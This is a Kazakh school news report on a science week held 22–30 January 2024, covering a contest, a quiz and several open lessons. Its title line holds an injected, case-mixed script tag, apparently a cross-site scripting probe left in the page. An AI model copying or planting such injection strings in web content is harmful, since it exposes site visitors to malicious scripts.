«Ғылым.Табиғат. Тіршілік» атты жаратылыстану пәнінің апталығын өткізудің қорытындысы туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.02.2024

«Ақмола облысы білім басқармасының Есіл ауданы бойынша білім бөлімі Құмай ауылының негізгі орта мектебі» КММ мектебінде

 

 «Ғылым.Табиғат. Тіршілік» атты жаратылыстану пәнінің апталығын өткізудің қорытындысы туралы ақпарат

     Апталықтың мақсаты:

      Оқушылардың ғылыми-жаратылыстану пәндерін оқуға деген қызығушылығын арттыру, олардың жағымды эмоцияларын ояту, өздігімен тұжырымдауға және жалпылауға үйрету, оқушылардың ой-өрісі мен зиятын қосымша білімдермен байыту.

 

Өтетін күні: 22.01-30.01.2024

 

Апталық күнделігі

   

      Күні: 22.01.2024 жыл «Апталықтың ашылуы» сап түзеу салтанаты

   «Құмай ауылының НОМ» мектебінде "Ғылым. Табиғат. Тіршілік" атты жаратылыстану-ғылыми сауаттылық білім берудегі апталығының ашылуы болды. Апталықтың мақсаты: Оқушылардың ғылыми-жаратылыстану пәндерін оқуға деген қызығушылығын арттыру, олардың жағымды эмоцияларын ояту, өздігімен тұжырымдауға және жалпылауға үйрету, оқушылардың ой-өрісі мен зиятын қосымша білімдермен байыту.Саптық жиын өткізіліп, бағдарлама таныстырылып, ғылым туралы баяндама оқылды. "Кіріктірілген ойындар" сайыс сабақ өтті. Ұйымдастырушы география пәнінің мұғалімі: Бекмаганбетов А.А.

Мақсаты: Оқушылардың  шығармашылық қабілетін, қиялын дамыту.

 

Күні: 23.01.2024 жыл

 «Туған өлкем -қандай көркем!» сурет байқауы

   Жаратылыстану-ғылыми сауаттылықты дамыту апталығының екінші күні  

«Туған өлкем -қандай көркем!» деп аталды. Бұл күні 2-4 сынып оқушылары өздерінің суретшілік қасиетін сынайды. Ең әдемі суреттер марапатталып, шағын сыйлықтар үлестірілді. Мақсаты: Оқушылардың қызығушылығын ояту, шеберлігін дамыту. Ұйымдастырған: 4 сынып жетекшісі- Малигова Мейрамгул

 

 

Күні: 24.01.2024

 «Табиғат білгірлері» ойын викторинасы

   Жаратылыстану-ғылыми сауаттылық апталығының үшінші күні 2-4-сынып оқушылары арасында «Табиғат білгірлері» ойын викторинасы ұйымдастырылды.  Мақсаты: оқушыларды табиғатты аялауға тәрбиелеу, құстарға қамқорлық таныту. Ұйымдастырған: 3 сынып жетекшісі Жұмабек Т.Ж

  

Күні: 25.01.2024 жыл

«Дыбысты бәсеңдетуге бола ма?» 4 сыныптың ашық сабағы. Өткізген: Малигова Мейрамгул

     Апталықтың төртінші күнінде "Дыбысты бәсеңдетуге бола ма?" тақырыбында 4 сыныпта ашық сабақ өтті. Мақсаты: Белгілі бір кедергілердің дыбыстың қаттылығымен таралуына әсерін зерттеу және түсіндіру. Ашық сабақта « Додокаэдр» шеңберімен жағымды көңіл күй жасап, үй тапсырмасын  «Ілгіш» әдісімен тексеріп, жаңа тақырыпты «Адасқан әріптермен» ашқызып, « Көгершіннен хат» әдісі арқылы жаңа сабақта талдап, қызықты сергіту «Алма, шие, банан» сергіту сәтін ұйымдастырып, «ВЕЕР» әдісімен сабақты қорытындылап, «медаль тағу» бағалауымен сабақ сәтті өтті. Сабақ жақсы деңгейде өтті.

 

Күні: 26.01.2024

«Жер сфералары дегеніміз не?» ашық сабақ 3-сынып оқушылары арасында ұйымдастырылды. Ұйымдастырған: 3 сынып жетекшісі Жұмабек Т.Ж Сабақтың мақсаты: Жер сфераларын түсндіру және графиктік кескіндеу. Ұйымдастыруы шаттық шеңберімен, баскетбол ҚБ әдісімен, қима қағазда жұмыстар жасалды.Сиқырлы сандықтар мен керібайланыс жасалды. Сабақ жақсы деңгейде өтті.

   

Күні: 26.01.2024 жыл

Апталықтың соңғы күні өтілген іс-шараларға талдау жасалып, белсене қатысқан оқушылар марапатталды.

 

 

 

Просмотров: 8212


Пікір қосу



Деректерді қолтаңбаға қосу